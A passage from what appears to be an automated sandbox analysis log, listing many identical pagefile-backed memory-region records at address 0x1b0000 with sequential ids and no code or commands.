0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8912 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8913 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8914 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8915 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8916 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8917 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8918 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8919 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8920 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8925 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8926 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8927 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8928 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8929 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8930 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8931 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8932 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8933 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8934 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8935 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8936 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8937 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8938 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8939 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8940 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8941 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8942 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8943 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8944 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8945 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8946 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8947 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8948 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8949 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8950 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8951 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8952 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8953 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8954 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8955 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8956 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8957 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8958 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8959 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8960 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8961 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8962 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8963 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8964 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8965 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8966 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8967 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8968 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8969 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8970 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8971 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8972 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8973 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8974 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8975 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8978 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8979 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8980 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8981 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8982 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8983 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8984 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8985 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8986 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8987 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8988 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8989 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8990 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8991 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8992 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8993 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8994 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8995 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8996 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8997 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8998 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8999 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9000 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9001 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9002 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9003 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9004 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9005 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9006 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9007 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9008 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9009 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9010 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9011 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9012 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9013 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9014 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9015 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9016 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9017 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9018 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9019 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9020 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9021 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9022 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9023 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9024 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9025 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9026 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9027 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9028 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9029 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9030 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9031 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9032 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9033 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9034 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9035 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9036 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9037 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9038 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9039 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9040 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9041 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9042 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9043 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9044 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9045 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9046 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9047 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9048 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9049 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9050 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9051 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9052 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9053 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9054 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9055 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9056 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9057 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9058 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9059 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9060 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9061 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9062 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9066 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9067 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9068 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9069 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9070 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9071 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9072 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9073 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9074 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9075 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9076 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9077 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9078 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9079 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9080 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9081 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9082 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9083 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9084 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9085 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9086 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9087 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9088 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9089 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9090 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9091 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9092 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9093 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9094 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9095 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 